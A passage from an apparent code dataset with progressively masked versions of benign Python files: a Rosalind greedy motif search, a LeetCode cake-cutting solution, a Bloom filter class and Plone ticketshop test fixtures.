"step-2": "<mask token>\n\n\ndef greedy_motif_search(dnas, k, t):\n best_motifs = [dna[:k] for dna in dnas]\n best_score = score_motifs(best_motifs)\n for i in range(len(dnas[0]) - k + 1):\n print(i)\n motifs = [dnas[0][i:i + k]]\n for j in range(1, t):\n motifs.append(profile_most_probable(dnas[j], k, form_profile(\n motifs)))\n score = score_motifs(motifs)\n if score < best_score:\n best_motifs = motifs\n best_score = score\n return best_motifs\n\n\ndef form_profile(motifs):\n profile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)\n for motif in motifs:\n for i, base in enumerate(motif):\n profile.loc[base, i] += 1\n return profile / len(motifs)\n\n\ndef score_motifs(motifs):\n profile = form_profile(motifs)\n consensus = ''.join(profile.idxmax())\n return sum(hamming_distance(motif, consensus) for motif in motifs)\n\n\ndef main():\n with open(filename) as f:\n k, t = list(map(int, f.readline().strip().split()))\n dnas = [line.strip() for line in f.readlines()]\n for motif in greedy_motif_search(dnas, k, t):\n print(motif)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nfilename = 'rosalind_ba2d.txt'\nBASES = ['A', 'C', 'G', 'T']\n\n\ndef greedy_motif_search(dnas, k, t):\n best_motifs = [dna[:k] for dna in dnas]\n best_score = score_motifs(best_motifs)\n for i in range(len(dnas[0]) - k + 1):\n print(i)\n motifs = [dnas[0][i:i + k]]\n for j in range(1, t):\n motifs.append(profile_most_probable(dnas[j], k, form_profile(\n motifs)))\n score = score_motifs(motifs)\n if score < best_score:\n best_motifs = motifs\n best_score = score\n return best_motifs\n\n\ndef form_profile(motifs):\n profile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)\n for motif in motifs:\n for i, base in enumerate(motif):\n profile.loc[base, i] += 1\n return profile / len(motifs)\n\n\ndef score_motifs(motifs):\n profile = form_profile(motifs)\n consensus = ''.join(profile.idxmax())\n return sum(hamming_distance(motif, consensus) for motif in motifs)\n\n\ndef main():\n with open(filename) as f:\n k, t = list(map(int, f.readline().strip().split()))\n dnas = [line.strip() for line in f.readlines()]\n for motif in greedy_motif_search(dnas, k, t):\n print(motif)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport pandas as pd\nfrom ba1g import hamming_distance\nfrom ba2c import profile_most_probable\nfilename = 'rosalind_ba2d.txt'\nBASES = ['A', 'C', 'G', 'T']\n\n\ndef greedy_motif_search(dnas, k, t):\n best_motifs = [dna[:k] for dna in dnas]\n best_score = score_motifs(best_motifs)\n for i in range(len(dnas[0]) - k + 1):\n print(i)\n motifs = [dnas[0][i:i + k]]\n for j in range(1, t):\n motifs.append(profile_most_probable(dnas[j], k, form_profile(\n motifs)))\n score = score_motifs(motifs)\n if score < best_score:\n best_motifs = motifs\n best_score = score\n return best_motifs\n\n\ndef form_profile(motifs):\n profile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)\n for motif in motifs:\n for i, base in enumerate(motif):\n profile.loc[base, i] += 1\n return profile / len(motifs)\n\n\ndef score_motifs(motifs):\n profile = form_profile(motifs)\n consensus = ''.join(profile.idxmax())\n return sum(hamming_distance(motif, consensus) for motif in motifs)\n\n\ndef main():\n with open(filename) as f:\n k, t = list(map(int, f.readline().strip().split()))\n dnas = [line.strip() for line in f.readlines()]\n for motif in greedy_motif_search(dnas, k, t):\n print(motif)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "'''\nImplement GreedyMotifSearch\nhttp://rosalind.info/problems/ba2d/\n\nGiven: Integers k and t, followed by a collection of strings Dna.\n\nReturn: A collection of strings BestMotifs resulting from running GreedyMotifSearch(Dna, k, t). If at any step you find more than one Profile-most probable k-mer in a given string, use the one occurring first.\n'''\nimport pandas as pd\n\nfrom ba1g import hamming_distance\nfrom ba2c import profile_most_probable\n\nfilename = 'rosalind_ba2d.txt'\nBASES = ['A', 'C', 'G', 'T']\n\ndef greedy_motif_search(dnas, k, t):\n\t# took ~4 min to run on test dataset but seems to be the correct algorithm\n\t# based on pseudocode (and other peoples' submissions)\n\tbest_motifs = [dna[:k] for dna in dnas]\n\tbest_score = score_motifs(best_motifs)\n\tfor i in range(len(dnas[0]) - k + 1):\n\t\tprint(i)\n\t\tmotifs = [dnas[0][i:i+k]]\n\t\tfor j in range(1, t):\n\t\t\tmotifs.append(profile_most_probable(dnas[j], k, form_profile(motifs)))\n\t\tscore = score_motifs(motifs)\n\t\tif score < best_score:\n\t\t\tbest_motifs = motifs\n\t\t\tbest_score = score\n\treturn best_motifs\n\ndef form_profile(motifs):\n\tprofile = pd.DataFrame(0, columns=range(len(motifs[0])), index=BASES)\n\tfor motif in motifs:\n\t\tfor i, base in enumerate(motif):\n\t\t\tprofile.loc[base, i] += 1\n\treturn profile / len(motifs)\n\ndef score_motifs(motifs):\n\t# couldn't figure out what 'score' from pseudocode meant :(\n\t# had to reference someone else's code:\n\t# https://github.com/NathanielLovin/Rosalind/blob/master/BA2D.py\n\tprofile = form_profile(motifs)\n\t# neat df function generates the consensus string\n\tconsensus = ''.join(profile.idxmax())\n\treturn sum(hamming_distance(motif, consensus) for motif in motifs)\n\ndef main():\n\twith open(filename) as f:\n\t\tk, t = list(map(int, f.readline().strip().split()))\n\t\tdnas = [line.strip() for line in f.readlines()]\n\tfor motif in greedy_motif_search(dnas, k, t):\n\t\tprint(motif)\n\nif __name__ == '__main__':\n\tmain()\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
from typing import List
h = 5
w = 4
horizontalCuts = [3]
verticalCuts = [3]
class Solution:
def maxArea(self, h: int, w: int, horizontalCuts: List[int], verticalCuts: List[int]) -> int:
horizontalCuts.sort()
verticalCuts.sort()
horizontalCuts.append(h)
verticalCuts.append(w)
hbreadth= 0
prev=0
for h in horizontalCuts:
height= h-prev
hbreadth= max(height, hbreadth)
prev= h
prev=0
vlength=0
for v in verticalCuts:
height= v-prev
vlength= max(vlength, height)
prev=v
maxarea= (hbreadth * vlength) % ((10**9) + 7)
return maxarea
obj=Solution()
print(obj.maxArea(h, w, horizontalCuts, verticalCuts))
|
normal
|
{
"blob_id": "8fb559810fbf79f0849ed98e51d3f2ad1ccc4b8b",
"index": 8296,
"step-1": "<mask token>\n\n\nclass Solution:\n\n def maxArea(self, h: int, w: int, horizontalCuts: List[int],\n verticalCuts: List[int]) ->int:\n horizontalCuts.sort()\n verticalCuts.sort()\n horizontalCuts.append(h)\n verticalCuts.append(w)\n hbreadth = 0\n prev = 0\n for h in horizontalCuts:\n height = h - prev\n hbreadth = max(height, hbreadth)\n prev = h\n prev = 0\n vlength = 0\n for v in verticalCuts:\n height = v - prev\n vlength = max(vlength, height)\n prev = v\n maxarea = hbreadth * vlength % (10 ** 9 + 7)\n return maxarea\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def maxArea(self, h: int, w: int, horizontalCuts: List[int],\n verticalCuts: List[int]) ->int:\n horizontalCuts.sort()\n verticalCuts.sort()\n horizontalCuts.append(h)\n verticalCuts.append(w)\n hbreadth = 0\n prev = 0\n for h in horizontalCuts:\n height = h - prev\n hbreadth = max(height, hbreadth)\n prev = h\n prev = 0\n vlength = 0\n for v in verticalCuts:\n height = v - prev\n vlength = max(vlength, height)\n prev = v\n maxarea = hbreadth * vlength % (10 ** 9 + 7)\n return maxarea\n\n\n<mask token>\nprint(obj.maxArea(h, w, horizontalCuts, verticalCuts))\n",
"step-3": "<mask token>\nh = 5\nw = 4\nhorizontalCuts = [3]\nverticalCuts = [3]\n\n\nclass Solution:\n\n def maxArea(self, h: int, w: int, horizontalCuts: List[int],\n verticalCuts: List[int]) ->int:\n horizontalCuts.sort()\n verticalCuts.sort()\n horizontalCuts.append(h)\n verticalCuts.append(w)\n hbreadth = 0\n prev = 0\n for h in horizontalCuts:\n height = h - prev\n hbreadth = max(height, hbreadth)\n prev = h\n prev = 0\n vlength = 0\n for v in verticalCuts:\n height = v - prev\n vlength = max(vlength, height)\n prev = v\n maxarea = hbreadth * vlength % (10 ** 9 + 7)\n return maxarea\n\n\nobj = Solution()\nprint(obj.maxArea(h, w, horizontalCuts, verticalCuts))\n",
"step-4": "from typing import List\nh = 5\nw = 4\nhorizontalCuts = [3]\nverticalCuts = [3]\n\n\nclass Solution:\n\n def maxArea(self, h: int, w: int, horizontalCuts: List[int],\n verticalCuts: List[int]) ->int:\n horizontalCuts.sort()\n verticalCuts.sort()\n horizontalCuts.append(h)\n verticalCuts.append(w)\n hbreadth = 0\n prev = 0\n for h in horizontalCuts:\n height = h - prev\n hbreadth = max(height, hbreadth)\n prev = h\n prev = 0\n vlength = 0\n for v in verticalCuts:\n height = v - prev\n vlength = max(vlength, height)\n prev = v\n maxarea = hbreadth * vlength % (10 ** 9 + 7)\n return maxarea\n\n\nobj = Solution()\nprint(obj.maxArea(h, w, horizontalCuts, verticalCuts))\n",
"step-5": "from typing import List\nh = 5\nw = 4\nhorizontalCuts = [3]\nverticalCuts = [3]\nclass Solution:\n def maxArea(self, h: int, w: int, horizontalCuts: List[int], verticalCuts: List[int]) -> int:\n horizontalCuts.sort()\n verticalCuts.sort()\n horizontalCuts.append(h)\n verticalCuts.append(w)\n hbreadth= 0\n prev=0\n for h in horizontalCuts:\n height= h-prev\n hbreadth= max(height, hbreadth)\n prev= h\n\n prev=0\n vlength=0\n for v in verticalCuts:\n height= v-prev\n vlength= max(vlength, height)\n prev=v\n\n maxarea= (hbreadth * vlength) % ((10**9) + 7)\n return maxarea\n\nobj=Solution()\nprint(obj.maxArea(h, w, horizontalCuts, verticalCuts))\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#coding: utf-8
import mmh3
from bitarray import bitarray
BIT_SIZE = 1 << 30
class BloomFilter:
def __init__(self):
# Initialize bloom filter, set size and all bits to 0
bit_array = bitarray(BIT_SIZE)
bit_array.setall(0)
self.bit_array = bit_array
def add(self, val):
point_list = self.get_postions(val)
for b in point_list:
self.bit_array[b] = 1
def get_postions(self, val):
# Get points positions in bit vector.
# 提供不同的hash种子得到多个hash函数, seed最好为质数
point1 = mmh3.hash(val, 5) % BIT_SIZE
point2 = mmh3.hash(val, 7) % BIT_SIZE
point3 = mmh3.hash(val, 11) % BIT_SIZE
point4 = mmh3.hash(val, 13) % BIT_SIZE
point7 = mmh3.hash(val, 19) % BIT_SIZE
point5 = mmh3.hash(val, 23) % BIT_SIZE
point6 = mmh3.hash(val, 31) % BIT_SIZE
return [point1, point2, point3, point4, point5, point6]
def is_contains(self, val):
point_list = self.get_postions(val)
result = True
for b in point_list:
result = result and self.bit_array[b]
return result
if __name__ == '__main__':
bf = BloomFilter()
# 第一次运行时会显示 not exists
if bf.is_contains('zqw'):
print('exists')
else:
print('not exists')
bf.add('zqw')
if bf.is_contains('shooter'):
print('exists')
else:
bf.add('shooter')
if bf.is_contains('zqw'):
print('exists')
else:
bf.add('zqw')
|
normal
|
{
"blob_id": "5a103a4f72b9cd3ea3911aeefeeb2194c8ad7df0",
"index": 589,
"step-1": "<mask token>\n\n\nclass BloomFilter:\n\n def __init__(self):\n bit_array = bitarray(BIT_SIZE)\n bit_array.setall(0)\n self.bit_array = bit_array\n\n def add(self, val):\n point_list = self.get_postions(val)\n for b in point_list:\n self.bit_array[b] = 1\n <mask token>\n\n def is_contains(self, val):\n point_list = self.get_postions(val)\n result = True\n for b in point_list:\n result = result and self.bit_array[b]\n return result\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass BloomFilter:\n\n def __init__(self):\n bit_array = bitarray(BIT_SIZE)\n bit_array.setall(0)\n self.bit_array = bit_array\n\n def add(self, val):\n point_list = self.get_postions(val)\n for b in point_list:\n self.bit_array[b] = 1\n\n def get_postions(self, val):\n point1 = mmh3.hash(val, 5) % BIT_SIZE\n point2 = mmh3.hash(val, 7) % BIT_SIZE\n point3 = mmh3.hash(val, 11) % BIT_SIZE\n point4 = mmh3.hash(val, 13) % BIT_SIZE\n point7 = mmh3.hash(val, 19) % BIT_SIZE\n point5 = mmh3.hash(val, 23) % BIT_SIZE\n point6 = mmh3.hash(val, 31) % BIT_SIZE\n return [point1, point2, point3, point4, point5, point6]\n\n def is_contains(self, val):\n point_list = self.get_postions(val)\n result = True\n for b in point_list:\n result = result and self.bit_array[b]\n return result\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass BloomFilter:\n\n def __init__(self):\n bit_array = bitarray(BIT_SIZE)\n bit_array.setall(0)\n self.bit_array = bit_array\n\n def add(self, val):\n point_list = self.get_postions(val)\n for b in point_list:\n self.bit_array[b] = 1\n\n def get_postions(self, val):\n point1 = mmh3.hash(val, 5) % BIT_SIZE\n point2 = mmh3.hash(val, 7) % BIT_SIZE\n point3 = mmh3.hash(val, 11) % BIT_SIZE\n point4 = mmh3.hash(val, 13) % BIT_SIZE\n point7 = mmh3.hash(val, 19) % BIT_SIZE\n point5 = mmh3.hash(val, 23) % BIT_SIZE\n point6 = mmh3.hash(val, 31) % BIT_SIZE\n return [point1, point2, point3, point4, point5, point6]\n\n def is_contains(self, val):\n point_list = self.get_postions(val)\n result = True\n for b in point_list:\n result = result and self.bit_array[b]\n return result\n\n\nif __name__ == '__main__':\n bf = BloomFilter()\n if bf.is_contains('zqw'):\n print('exists')\n else:\n print('not exists')\n bf.add('zqw')\n if bf.is_contains('shooter'):\n print('exists')\n else:\n bf.add('shooter')\n if bf.is_contains('zqw'):\n print('exists')\n else:\n bf.add('zqw')\n",
"step-4": "<mask token>\nBIT_SIZE = 1 << 30\n\n\nclass BloomFilter:\n\n def __init__(self):\n bit_array = bitarray(BIT_SIZE)\n bit_array.setall(0)\n self.bit_array = bit_array\n\n def add(self, val):\n point_list = self.get_postions(val)\n for b in point_list:\n self.bit_array[b] = 1\n\n def get_postions(self, val):\n point1 = mmh3.hash(val, 5) % BIT_SIZE\n point2 = mmh3.hash(val, 7) % BIT_SIZE\n point3 = mmh3.hash(val, 11) % BIT_SIZE\n point4 = mmh3.hash(val, 13) % BIT_SIZE\n point7 = mmh3.hash(val, 19) % BIT_SIZE\n point5 = mmh3.hash(val, 23) % BIT_SIZE\n point6 = mmh3.hash(val, 31) % BIT_SIZE\n return [point1, point2, point3, point4, point5, point6]\n\n def is_contains(self, val):\n point_list = self.get_postions(val)\n result = True\n for b in point_list:\n result = result and self.bit_array[b]\n return result\n\n\nif __name__ == '__main__':\n bf = BloomFilter()\n if bf.is_contains('zqw'):\n print('exists')\n else:\n print('not exists')\n bf.add('zqw')\n if bf.is_contains('shooter'):\n print('exists')\n else:\n bf.add('shooter')\n if bf.is_contains('zqw'):\n print('exists')\n else:\n bf.add('zqw')\n",
"step-5": "#coding: utf-8\nimport mmh3\nfrom bitarray import bitarray\n\nBIT_SIZE = 1 << 30\n\nclass BloomFilter:\n\n def __init__(self):\n # Initialize bloom filter, set size and all bits to 0\n bit_array = bitarray(BIT_SIZE)\n bit_array.setall(0)\n\n self.bit_array = bit_array\n\n def add(self, val):\n point_list = self.get_postions(val)\n\n for b in point_list:\n self.bit_array[b] = 1\n\n def get_postions(self, val):\n # Get points positions in bit vector.\n # 提供不同的hash种子得到多个hash函数, seed最好为质数\n\n point1 = mmh3.hash(val, 5) % BIT_SIZE\n point2 = mmh3.hash(val, 7) % BIT_SIZE\n point3 = mmh3.hash(val, 11) % BIT_SIZE\n point4 = mmh3.hash(val, 13) % BIT_SIZE\n point7 = mmh3.hash(val, 19) % BIT_SIZE\n point5 = mmh3.hash(val, 23) % BIT_SIZE\n point6 = mmh3.hash(val, 31) % BIT_SIZE\n\n return [point1, point2, point3, point4, point5, point6]\n\n def is_contains(self, val):\n point_list = self.get_postions(val)\n\n result = True\n for b in point_list:\n result = result and self.bit_array[b]\n\n return result\n\n\nif __name__ == '__main__':\n\n bf = BloomFilter()\n\n # 第一次运行时会显示 not exists\n\n if bf.is_contains('zqw'):\n print('exists')\n else:\n print('not exists')\n bf.add('zqw')\n\n if bf.is_contains('shooter'):\n print('exists')\n else:\n bf.add('shooter')\n\n if bf.is_contains('zqw'):\n print('exists')\n else:\n bf.add('zqw')",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
from Products.CMFPlone.utils import getFSVersionTuple
from bda.plone.ticketshop.interfaces import ITicketShopExtensionLayer
from plone.app.robotframework.testing import MOCK_MAILHOST_FIXTURE
from plone.app.testing import FunctionalTesting
from plone.app.testing import IntegrationTesting
from plone.app.testing import PLONE_FIXTURE
from plone.app.testing import PloneSandboxLayer
from plone.app.testing import TEST_USER_ID
from plone.app.testing import setRoles
from plone.testing import z2
from zope.interface import alsoProvides
import plone.api
if getFSVersionTuple()[0] >= 5:
PLONE5 = 1
else:
PLONE5 = 0
def set_browserlayer(request):
"""Set the BrowserLayer for the request.
We have to set the browserlayer manually, since importing the profile alone
doesn't do it in tests.
"""
alsoProvides(request, ITicketShopExtensionLayer)
class TicketshopLayer(PloneSandboxLayer):
defaultBases = (PLONE_FIXTURE,)
def setUpZope(self, app, configurationContext):
import bda.plone.ticketshop
self.loadZCML(package=bda.plone.ticketshop,
context=configurationContext)
# Install products that use an old-style initialize() function
z2.installProduct(app, 'Products.DateRecurringIndex')
def setUpPloneSite(self, portal):
self.applyProfile(portal, 'bda.plone.ticketshop:default')
def tearDownZope(self, app):
# Uninstall old-style Products
z2.uninstallProduct(app, 'Products.DateRecurringIndex')
Ticketshop_FIXTURE = TicketshopLayer()
Ticketshop_INTEGRATION_TESTING = IntegrationTesting(
bases=(Ticketshop_FIXTURE,),
name="Ticketshop:Integration")
class TicketshopATLayer(PloneSandboxLayer):
# don't use shop fixture here. looks like, test layers use differen ZODB
# connections and c.z.datagriedfield fails with a ZODB object reference
# error.
defaultBases = (PLONE_FIXTURE,)
def setUpZope(self, app, configurationContext):
import Products.ATContentTypes
self.loadZCML(package=Products.ATContentTypes,
context=configurationContext)
import bda.plone.ticketshop
self.loadZCML(package=bda.plone.ticketshop,
context=configurationContext)
# Install products that use an old-style initialize() function
z2.installProduct(app, 'Products.DateRecurringIndex')
z2.installProduct(app, 'bda.plone.ticketshop.at')
def setUpPloneSite(self, portal):
if PLONE5:
self.applyProfile(portal, 'Products.ATContentTypes:default')
self.applyProfile(portal, 'bda.plone.ticketshop.at:default')
portal.portal_workflow.setDefaultChain("one_state_workflow")
setRoles(portal, TEST_USER_ID, ['Manager'])
# Create test users
cru = plone.api.user.create
cru(email="[email protected]", username="customer1", password="customer1")
cru(email="[email protected]", username="customer2", password="customer2")
cru(email="[email protected]", username="vendor1", password="vendor1")
cru(email="[email protected]", username="vendor2", password="vendor2")
# Create test content
crc = plone.api.content.create
crc(container=portal, type='Buyable Event', id='folder_1')
crc(container=portal['folder_1'], type='Ticket', id='item_11',
title="item_11")
crc(container=portal['folder_1'], type='Ticket', id='item_12',
title="item_12")
crc(container=portal, type='Buyable Event', id='folder_2')
crc(container=portal['folder_2'], type='Ticket', id='item_21',
title="item_21")
crc(container=portal['folder_2'], type='Ticket', id='item_22',
title="item_22")
TicketshopAT_FIXTURE = TicketshopATLayer()
TicketshopAT_INTEGRATION_TESTING = IntegrationTesting(
bases=(TicketshopAT_FIXTURE,),
name="TicketshopAT:Integration")
TicketshopAT_ROBOT_TESTING = FunctionalTesting(
bases=(
MOCK_MAILHOST_FIXTURE,
TicketshopAT_FIXTURE,
z2.ZSERVER_FIXTURE
),
name="TicketshopAT:Robot")
|
normal
|
{
"blob_id": "5d7080f2778133d1938853512ca038edcf7c0dc4",
"index": 1002,
"step-1": "<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n <mask token>\n <mask token>\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-4": "<mask token>\nif getFSVersionTuple()[0] >= 5:\n PLONE5 = 1\nelse:\n PLONE5 = 0\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-5": "from Products.CMFPlone.utils import getFSVersionTuple\nfrom bda.plone.ticketshop.interfaces import ITicketShopExtensionLayer\nfrom plone.app.robotframework.testing import MOCK_MAILHOST_FIXTURE\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.app.testing import TEST_USER_ID\nfrom plone.app.testing import setRoles\nfrom plone.testing import z2\nfrom zope.interface import alsoProvides\nimport plone.api\n\nif getFSVersionTuple()[0] >= 5:\n PLONE5 = 1\nelse:\n PLONE5 = 0\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop,\n context=configurationContext)\n\n # Install products that use an old-style initialize() function\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n # Uninstall old-style Products\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\nTicketshop_FIXTURE = TicketshopLayer()\nTicketshop_INTEGRATION_TESTING = IntegrationTesting(\n bases=(Ticketshop_FIXTURE,),\n name=\"Ticketshop:Integration\")\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n # don't use shop fixture here. looks like, test layers use differen ZODB\n # connections and c.z.datagriedfield fails with a ZODB object reference\n # error.\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes,\n context=configurationContext)\n\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop,\n context=configurationContext)\n\n # Install products that use an old-style initialize() function\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n\n portal.portal_workflow.setDefaultChain(\"one_state_workflow\")\n setRoles(portal, TEST_USER_ID, ['Manager'])\n\n # Create test users\n cru = plone.api.user.create\n cru(email=\"[email protected]\", username=\"customer1\", password=\"customer1\")\n cru(email=\"[email protected]\", username=\"customer2\", password=\"customer2\")\n cru(email=\"[email protected]\", username=\"vendor1\", 